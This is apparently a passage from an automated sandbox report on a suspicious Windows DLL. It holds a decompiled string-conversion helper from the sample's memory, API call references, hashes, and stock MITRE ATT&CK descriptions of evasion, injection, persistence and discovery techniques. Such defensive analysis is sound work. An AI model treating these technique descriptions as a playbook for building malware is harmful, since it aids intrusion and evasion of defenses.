								_v12 = _t27;
								_t30 = E00E6018A(_t27);
								_t7 =  &_v12; // 0xe579e5
								E00E58600(_t7, _t20);
							} else {
								_t5 =  &_v12; // 0xe579e5
								E00E58600(_t5, 0);
							}
						}
					}
				}
				return _t30;
			}

0x00e58262
0x00e58263
0x00e58264
0x00e58267
0x00e58269
0x00e5826e
0x00e58284
0x00e58288
0x00e5828a
0x00e58294
0x00e58296
0x00e5829c
0x00e582b5
0x00e582c6
0x00e582ce
0x00e582d0
0x00e582d5
0x00e582b7
0x00e582b7
0x00e582bc
0x00e582c2
0x00e582b5
0x00e582dd
0x00e582de
0x00e582e3

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00E579E5,00000000), ref: 00E5827E

Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00E579E5,00000000), ref: 00E582AD

Part of subcall function 00E58600: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00E56020), ref: 00E58646

Strings

y, xrefs: 00E582D0, 00E582B7, 00E582BB, 00E582D4

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: ByteCharHeapMultiWide$AllocateFree
String ID: y
API String ID: 2707280033-155935048
Opcode ID: b336d3ad693303e1c339aef1cd669794fbbc0f4e13734c99c879fb6899a189fb
Instruction ID: c4dcecb5801c336ba262e083a736c274fbe0b6cdefa94b6ad2f319d1f0a11594
Opcode Fuzzy Hash: b336d3ad693303e1c339aef1cd669794fbbc0f4e13734c99c879fb6899a189fb
Instruction Fuzzy Hash: 6201FE75506615BA97205AAB5D59CDB7EECDF417B1B100625F904F2191ED70CD08C2B0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report ZBvNS77A7a.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Persistence and Installation Behavior:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 5756 Parent PID: 5240

General

Analysis Process: cmd.exe PID: 796 Parent PID: 5756

Function 1000D02A, Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 282
COMMON

Function 1000C6CB, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200
nativeregistrymemoryCOMMON

Function 1000CB82, Relevance: 9.1, APIs: 6, Instructions: 105
nativethreadCOMMON

Function 1000AB89, Relevance: 7.6, APIs: 5, Instructions: 65
processCOMMON

Function 1000DFB8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Function 10005F6A, Relevance: 12.1, APIs: 8, Instructions: 104
threadCOMMON

Function 1000B78E, Relevance: 7.6, APIs: 5, Instructions: 83
stringCOMMON

Function 1000CA30, Relevance: 4.6, APIs: 3, Instructions: 120
threadCOMMON

Function 1000B97E, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Function 1000AE4C, Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Function 1000E1C7, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Function 1000CCCB, Relevance: 2.5, APIs: 2, Instructions: 48
sleepstringCOMMON

Function 10005E7E, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Function 100085D5, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Function 1000BA48, Relevance: 1.3, APIs: 1, Instructions: 82
COMMON

Function 100085EA, Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Function 1001538F, Relevance: 8.1, Strings: 6, Instructions: 577
COMMONCrypto

Function 1000D52E, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Function 1000AE9A, Relevance: 3.1, APIs: 2, Instructions: 113
fileCOMMON

Function 10016EC0, Relevance: .4, Instructions: 359
COMMONCrypto

Function 030919A1, Relevance: .3, Instructions: 275
COMMONCrypto

Function 1000DB47, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Function 1000E673, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Function 100116C3, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Function 1001212D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON